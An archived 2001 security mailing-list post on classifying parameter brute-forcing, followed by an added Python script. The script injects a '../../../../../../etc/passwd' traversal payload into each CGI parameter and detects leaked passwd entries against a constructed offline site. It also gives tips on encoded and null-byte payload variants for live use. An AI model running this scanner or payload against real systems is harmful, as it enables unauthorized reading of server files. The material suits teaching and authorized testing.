From: Jeremiah Grossman (jeremiah at whitehatsec.com)
Date: Mon Oct 01 2001 - 12:09:16 CDT
Dennis Groves wrote:
> >
> > hi all,
> >
> > sorry for this late input/question .. but .. which category does
> >
> > "PARAMETER BRUTE-FORCING/GUESSING"
> >
>
> What will you do with this information? How does it break a web application?
> I am inclined to think that it belongs in INFORMATION GATHERING as CGI
> PARAMETER ENUMERATION.
>
> Dennis
This is a little about what someone said before... "attacks covering multiple
classes".
Parameter brute forcing is a real attack and can be used for both enumeration
AND penetration. Case in point...
the recent Apache bug that can gather active usernames on the system... or
scripting a parameter tampering attack that replaces all parameters in all
CGIs on a site with "../../../../../../etc/passwd". Yes, this has worked on
many high profile sites.
So, as you can see, it's both.
The kind of thing we have to work through and not get hung up on.
Jer-
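The scripted parameter-tampering attack described in the message above, written out as an added example (this is not code from the original post or from the poster): every query parameter of every CGI URL in a site map is swapped, one at a time, for a directory-traversal payload, and each response is checked for the signature of a leaked /etc/passwd. The site map, the vulnerable `showfile.cgi`, and the `fake_fetch` function standing in for real HTTP requests are all constructed for this example so it runs offline; substituting a real fetch (e.g. `urllib.request.urlopen`) would make it a live scan, which needs authorization.

```python
"""Added example: parameter tampering with a traversal payload, one
parameter at a time, with a response check for a leaked /etc/passwd.
The site map, the vulnerable CGI and fake_fetch are constructed here."""
import re
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

TRAVERSAL = "../../../../../../etc/passwd"

# A real /etc/passwd leak contains at least the root entry; match the
# colon-separated layout (name:pw:uid:gid:...) rather than the bare word.
_PASSWD_LINE = re.compile(r"^root:[^:]*:0:0:", re.MULTILINE)


def mutate_params(url, payload=TRAVERSAL):
    """Yield (param_name, mutated_url), one per query parameter, with
    that single parameter replaced by the payload. Doing one at a time
    (instead of all at once) tells you which parameter is the sink."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    for i, (name, _) in enumerate(params):
        tampered = list(params)
        tampered[i] = (name, payload)
        yield name, urlunsplit(parts._replace(query=urlencode(tampered)))


def looks_like_passwd(body):
    """True if the response body carries a passwd-style root entry."""
    return bool(_PASSWD_LINE.search(body))


def scan(urls, fetch, payload=TRAVERSAL):
    """Run every mutation through fetch(url) -> body and return findings
    as (original_url, param_name, mutated_url) tuples."""
    findings = []
    for url in urls:
        for name, mutated in mutate_params(url, payload):
            if looks_like_passwd(fetch(mutated)):
                findings.append((url, name, mutated))
    return findings


# Constructed stand-in for a target site. Only showfile.cgi's "page"
# parameter is vulnerable: it opens whatever path it is handed.
SITE_MAP = [
    "http://example.test/cgi-bin/showfile.cgi?page=about.html&lang=en",
    "http://example.test/cgi-bin/search.cgi?q=test",
]
_FAKE_PASSWD = (
    "root:x:0:0:root:/root:/bin/sh\n"
    "nobody:x:65534:65534:nobody:/:/sbin/nologin\n"
)


def fake_fetch(url):
    """Constructed HTTP stand-in: behaves like the vulnerable site above."""
    parts = urlsplit(url)
    params = dict(parse_qsl(parts.query))
    if parts.path.endswith("showfile.cgi") and params.get("page", "").endswith("/etc/passwd"):
        return _FAKE_PASSWD
    return "<html><body>nothing to see</body></html>"


if __name__ == "__main__":
    for url, name, mutated in scan(SITE_MAP, fake_fetch):
        print(f"{url}: parameter '{name}' leaks /etc/passwd via {mutated}")
```

The signature check matters as much as the payload: matching on the word "root" alone gives false positives on ordinary pages, so the regex anchors on the `root:...:0:0:` field layout. A live version should also try URL-encoded and null-byte-terminated variants of the payload, since many CGIs of that era appended an extension before opening the file.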